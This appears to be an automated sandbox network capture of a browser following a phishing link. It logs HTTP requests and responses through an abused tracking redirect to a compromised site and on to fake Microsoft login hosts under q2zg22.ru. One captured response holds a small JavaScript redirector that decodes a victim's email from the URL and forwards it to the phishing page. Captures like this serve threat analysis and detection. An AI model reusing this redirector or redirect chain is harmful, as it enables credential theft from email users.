                                                                                                                          Cookie: NID=511=LtGInZ4I4WDrCvCHQBVMHOy4a-sqzpSrMO-Rwr8ezStTz_kfoi2bri7uGdXfNvskAEO_Tj5Jkwl0XSN-qA6MYiGShcDB_vNQOl1bpl3aua7gMrDRvWsHLpAuFBlBnNxTMeen95XElzx3r4myG8p8sgSHdx4NBawYGaI5oFn_dZ8
                                                                                                                          2024-02-02 19:17:40 UTC1OUTData Raw: 20
                                                                                                                          Data Ascii:
                                                                                                                          2024-02-02 19:17:40 UTC1799INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Access-Control-Allow-Origin: https://www.google.com
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:40 GMT
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-_3eJ6XmFBcOH170OslGQXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmII1pBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIR6OK_-_rGUTmPFuyn8mAL7mGHw"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-02-02 19:17:40 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                          Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                          2024-02-02 19:17:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.1649727142.251.15.1134435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:40 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                          Host: clients2.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          X-Goog-Update-Interactivity: fg
                                                                                                                          X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                          X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:40 UTC732INHTTP/1.1 200 OK
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-zvzOLWiAkPjccjTm9-F-4A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:40 GMT
                                                                                                                          Content-Type: text/xml; charset=UTF-8
                                                                                                                          X-Daynum: 6241
                                                                                                                          X-Daystart: 40660
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-02-02 19:17:40 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 34 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 30 36 36 30 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                          Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6241" elapsed_seconds="40660"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                          2024-02-02 19:17:40 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                          Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                          2024-02-02 19:17:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.164972835.181.229.1384435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:41 UTC807OUTGET /c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit HTTP/1.1
                                                                                                                          Host: sushishop.commander1.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:41 UTC1386INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
                                                                                                                          Set-Cookie: tc_cj_v2=%20%28%7B%24%27%24%29%22ZZZ%29%20%2A%27%7B%29%20ZZZKQJPSJKNPKJJJZZZ%5Dfc%5De; expires=Sat, 01-Feb-2025 19:17:41 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: tc_cj_v2_cmp=LJLMKKLQy%20%28%7B%24%27y-%20%27%7B%29%7D%20y%7B%2B%2BMJy%7C%20%21-; expires=Sat, 01-Feb-2025 19:17:41 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: tc_cj_v2_med=%7B%7D%2F0; expires=Sat, 01-Feb-2025 19:17:41 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCID=16fae09848cf2bf078ca3f065e274a8a; expires=Sat, 01-Feb-2025 19:17:41 GMT; Max-Age=31536000; path=/; domain=.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCSESSION=20240202201741992404317; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCREDIRECT=1; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCREDIRECT_DEDUP=1; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          location: //galeonconstruction.com/nin/niit
                                                                                                                          Server: web
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          2024-02-02 19:17:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.1649730162.241.124.474435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:41 UTC673OUTGET /nin/niit HTTP/1.1
                                                                                                                          Host: galeonconstruction.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:41 UTC224INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:41 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: https://galeonconstruction.com/nin/niit/
                                                                                                                          Content-Length: 248
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          2024-02-02 19:17:41 UTC248INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 61 6c 65 6f 6e 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2e 63 6f 6d 2f 6e 69 6e 2f 6e 69 69 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://galeonconstruction.com/nin/niit/">here</a>.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.1649731162.241.124.474435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:42 UTC674OUTGET /nin/niit/ HTTP/1.1
                                                                                                                          Host: galeonconstruction.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:42 UTC159INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:41 GMT
                                                                                                                          Server: Apache
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          2024-02-02 19:17:42 UTC239INData Raw: 65 34 0d 0a 3c 73 63 72 69 70 74 3e 20 0a 20 0a 76 61 72 20 65 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 28 31 29 3b 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 61 74 6f 62 28 65 6d 61 69 6c 29 3b 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 2d 64 32 76 6b 62 6d 76 7a 77 7a 67 66 2e 71 32 7a 67 32 32 2e 72 75 2f 6d 61 69 6c 2f 69 6e 62 6f 78 2f 23 27 20 2b 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 3b 20 7d 29 3b 20 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: e4<script> var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/#' + decodedString; }); </script>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.1649732104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:43 UTC714OUTGET /mail/inbox/ HTTP/1.1
                                                                                                                          Host: microsoft-d2vkbmvzwzgf.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:43 UTC855INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:43 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Location: https://office.q2zg22.ru/
                                                                                                                          Set-Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; Path=/; Domain=q2zg22.ru; Expires=Fri, 02 Feb 2024 20:17:43 GMT
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SfmD9W5e%2BUW969Ya610LSMnwxOM7GFHhY7%2FkM%2FJQvRwRcA9eXYc3zYyre7HQUvsaVhBukrvZ5inZzdv0mgZPVQDRByQLTgDLo9giu1MtkbPN5cd1KwE1AEJt%2BJ6jUPxLikubLFu2DSJ2oVfOa4AX7OaUeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6a12d0a137d-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.1649735172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:43 UTC771OUTGET / HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04
                                                                                                                          2024-02-02 19:17:44 UTC1358INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:44 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Location: https://react.q2zg22.ru/login
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X8; Path=/; Expires=Sun, 03 Mar 2024 19:17:44 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; Path=/; Domain=office.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: stsservicecookie=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Ests-Server: 2.1.17216.2 - WUS3 ProdSlices
                                                                                                                          X-Ms-Request-Id: ac68e654-ac95-4b29-8d27-8d1d1c28e000
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          2024-02-02 19:17:44 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 66 34 63 36 61 36 31 63 36 66 37 62 62 31 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: Server: cloudflareCF-RAY: 84f4c6a61c6f7bb1-ATLalt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:44 UTC467INData Raw: 31 63 63 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 2f 6c 6f 67 69 6e 23 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 2f 61 66 63 33 35 66 65 66 62 39 31 36 65 66 34 65 61 61 66 32 66 65 38 35 39 38 33 37 65 37 34 34 61 39 63 32 35 61 36 37 62 36 31 32 34 38 66 36 65 65 39 33 63 36 61 30 32 63 61 37 66 65 30 34 2f 35 32 31 33 39 33 66 66
                                                                                                                          Data Ascii: 1cc<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://react.q2zg22.ru/login#">here</a>.</h2><script type="application/javascript" src="/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ff
                                                                                                                          2024-02-02 19:17:44 UTC7INData Raw: 32 0d 0a 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2
                                                                                                                          2024-02-02 19:17:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.1649736104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:44 UTC775OUTGET /login HTTP/1.1
                                                                                                                          Host: react.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04
                                                                                                                          2024-02-02 19:17:45 UTC1238INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:45 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
